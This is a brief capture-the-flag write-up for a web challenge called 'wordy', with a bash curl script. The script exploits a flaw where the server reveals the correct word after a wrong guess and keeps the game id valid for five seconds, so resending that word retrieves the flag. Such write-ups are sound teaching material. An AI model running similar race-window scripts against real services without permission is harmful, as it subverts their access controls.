Tags: web scripting
Rating:
The task website challenge us to guess a five characters word, if the guessed word is correct, it give us the flag otherwise the the correct guess is returned alongside with a new game id.
If we try to resend the correct guess with the old game id we got the below error message:
> Expired or invalid game ID. Games are deleted 5 seconds after your guess to reduce memory usage.
As mentioned above, games are deleted 5 seconds after making a guess, so if we were able to resend the correct guess before the 5 seconds expire then we can get the flag, this lead us to use an automated script, below our bash script:
```
#!/bin/bash
#get the game id
game_id=$(curl https://uscg-web-wordy-w7vmh474ha-uc.a.run.app/api/game | sed 's/[\{\}]//g')
echo "[+]New game: $game_id"
#get the correct guess
echo "{\"guess\":\"test0\", $game_id}" > cookie
guess=$(curl -X POST -H 'Content-Type: application/json' https://uscg-web-wordy-w7vmh474ha-uc.a.run.app/api/guess -d @cookie | cut -d, -f1 | cut -d: -f2)
echo "[-]Guess should be: $guess"
#send back the correct guess before the 5 sec expire
echo "{\"guess\":$guess, $game_id}" > cookie
flag=$(curl -X POST -H 'Content-Type: application/json' https://uscg-web-wordy-w7vmh474ha-uc.a.run.app/api/guess -d @cookie | sed 's/.*\(USCG{[a-zA-Z0-9_-]*}\).*/\1/g')
echo "[+]Here is your flag: $flag"
```